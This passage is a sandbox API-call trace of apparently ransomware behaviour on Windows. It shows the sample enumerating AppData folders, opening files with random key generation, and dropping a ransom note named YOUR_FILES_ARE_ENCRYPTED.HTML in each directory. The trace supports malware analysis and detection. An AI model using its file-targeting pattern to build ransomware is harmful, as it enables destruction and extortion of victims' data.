lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.705] GetProcessHeap () returned 0x600000 [0118.705] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0118.706] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x8a7f62ab, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x28cbec4b, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x28cbec4b, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5da8, dwReserved1=0x6f5cd8, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0118.706] StrStrIW (lpFirst="INetCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.706] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetCache") returned 116 [0118.706] GetProcessHeap () returned 0x600000 [0118.706] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0118.707] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetCache" [0118.707] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetCache\\*" [0118.707] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x8a7f62ab, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x28cbec4b, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x28cbec4b, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f570, dwReserved1=0x6f5ce0, cFileName=".", cAlternateFileName="")) returned 0x626778 [0118.708] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x8a7f62ab, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x28cbec4b, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x28cbec4b, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f570, dwReserved1=0x6f5ce0, cFileName="..", cAlternateFileName="")) returned 1 [0118.708] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x735b21f3, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x735b21f3, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x735b21f3, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f570, dwReserved1=0x6f5ce0, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 1 [0118.708] StrStrIW (lpFirst="container.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.708] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetCache\\container.dat") returned 130 [0118.708] PathFindExtensionW (pszPath="container.dat") returned=".dat" [0118.708] lstrlenW (lpString=".dat") returned 4 [0118.708] PathFindExtensionW (pszPath="container.dat") returned=".dat" [0118.708] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0118.708] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetCache\\container.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\ac\\inetcache\\container.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0118.709] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=0) returned 1 [0118.709] CloseHandle (hObject=0x320) returned 1 [0118.709] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28cbec4b, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x2edd62db, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x2edd62db, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f570, dwReserved1=0x6f5ce0, cFileName="EJNCOSRA", cAlternateFileName="")) returned 1 [0118.709] StrStrIW (lpFirst="EJNCOSRA", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.709] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetCache\\EJNCOSRA") returned 125 [0118.709] GetProcessHeap () returned 0x600000 [0118.709] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3102fc8 [0118.710] lstrcpyW (in: lpString1=0x3102fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetCache\\EJNCOSRA" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetCache\\EJNCOSRA") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetCache\\EJNCOSRA" [0118.710] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetCache\\EJNCOSRA", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetCache\\EJNCOSRA\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetCache\\EJNCOSRA\\*" [0118.710] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetCache\\EJNCOSRA\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28cbec4b, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x2edd62db, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x2ef9147b, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x25000025, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0118.710] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28cbec4b, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x2edd62db, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x2ef9147b, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x25000025, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0118.710] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28cbec4b, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x2edd62db, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x2ef9147b, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x25000025, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 0 [0118.710] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0118.710] wnsprintfW (in: pszDest=0x3102fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetCache\\EJNCOSRA\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 155 [0118.710] GetProcessHeap () returned 0x600000 [0118.710] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.732] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetCache\\EJNCOSRA\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\ac\\inetcache\\ejncosra\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0118.732] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19de68, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19de68*=0x3c00, lpOverlapped=0x0) returned 1 [0118.733] CloseHandle (hObject=0x320) returned 1 [0118.734] GetProcessHeap () returned 0x600000 [0118.734] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.734] GetProcessHeap () returned 0x600000 [0118.734] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3102fc8 | out: hHeap=0x600000) returned 1 [0118.734] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28cbec4b, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x2edd62db, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x2edd62db, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f570, dwReserved1=0x6f5ce0, cFileName="EJNCOSRA", cAlternateFileName="")) returned 0 [0118.734] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0118.734] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 146 [0118.734] GetProcessHeap () returned 0x600000 [0118.734] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.734] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\ac\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0118.735] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0118.735] CloseHandle (hObject=0x32c) returned 1 [0118.736] GetProcessHeap () returned 0x600000 [0118.736] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.736] GetProcessHeap () returned 0x600000 [0118.736] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0118.737] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x8a7f62ab, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x736247ce, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x736247ce, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5da8, dwReserved1=0x6f5cd8, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0118.737] StrStrIW (lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.737] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetCookies") returned 118 [0118.737] GetProcessHeap () returned 0x600000 [0118.737] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0118.738] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetCookies" [0118.738] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetCookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetCookies\\*" [0118.738] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetCookies\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x8a7f62ab, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x736247ce, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x736247ce, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f570, dwReserved1=0x6f5ce0, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0118.738] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x8a7f62ab, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x736247ce, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x736247ce, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f570, dwReserved1=0x6f5ce0, cFileName="..", cAlternateFileName="")) returned 1 [0118.738] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x736247ce, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x736247ce, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x736247ce, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f570, dwReserved1=0x6f5ce0, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 1 [0118.738] StrStrIW (lpFirst="container.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.738] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetCookies\\container.dat") returned 132 [0118.738] PathFindExtensionW (pszPath="container.dat") returned=".dat" [0118.738] lstrlenW (lpString=".dat") returned 4 [0118.738] PathFindExtensionW (pszPath="container.dat") returned=".dat" [0118.738] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0118.738] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetCookies\\container.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\ac\\inetcookies\\container.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0118.739] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=0) returned 1 [0118.739] CloseHandle (hObject=0x320) returned 1 [0118.739] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x736247ce, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x736247ce, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x736247ce, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f570, dwReserved1=0x6f5ce0, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 0 [0118.739] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0118.740] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 148 [0118.740] GetProcessHeap () returned 0x600000 [0118.740] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.740] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\ac\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0118.741] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0118.742] CloseHandle (hObject=0x32c) returned 1 [0118.742] GetProcessHeap () returned 0x600000 [0118.742] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.742] GetProcessHeap () returned 0x600000 [0118.742] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0118.743] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x8a7f62ab, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x75bfdd8d, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x75bfdd8d, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5da8, dwReserved1=0x6f5cd8, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0118.743] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.743] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetHistory") returned 118 [0118.743] GetProcessHeap () returned 0x600000 [0118.743] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0118.744] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetHistory" [0118.744] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetHistory\\*" [0118.744] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x8a7f62ab, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x75bfdd8d, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x75bfdd8d, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f570, dwReserved1=0x6f5ce0, cFileName=".", cAlternateFileName="")) returned 0x626778 [0118.744] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x8a7f62ab, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x75bfdd8d, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x75bfdd8d, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f570, dwReserved1=0x6f5ce0, cFileName="..", cAlternateFileName="")) returned 1 [0118.744] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x75bd797b, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x75bfdd8d, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x75bfdd8d, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f570, dwReserved1=0x6f5ce0, cFileName="BackgroundTransferApi", cAlternateFileName="BACKGR~1")) returned 1 [0118.744] StrStrIW (lpFirst="BackgroundTransferApi", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.744] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetHistory\\BackgroundTransferApi") returned 140 [0118.744] GetProcessHeap () returned 0x600000 [0118.744] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3102fc8 [0118.745] lstrcpyW (in: lpString1=0x3102fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetHistory\\BackgroundTransferApi" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\INetHistory\\BackgroundTransferApi") 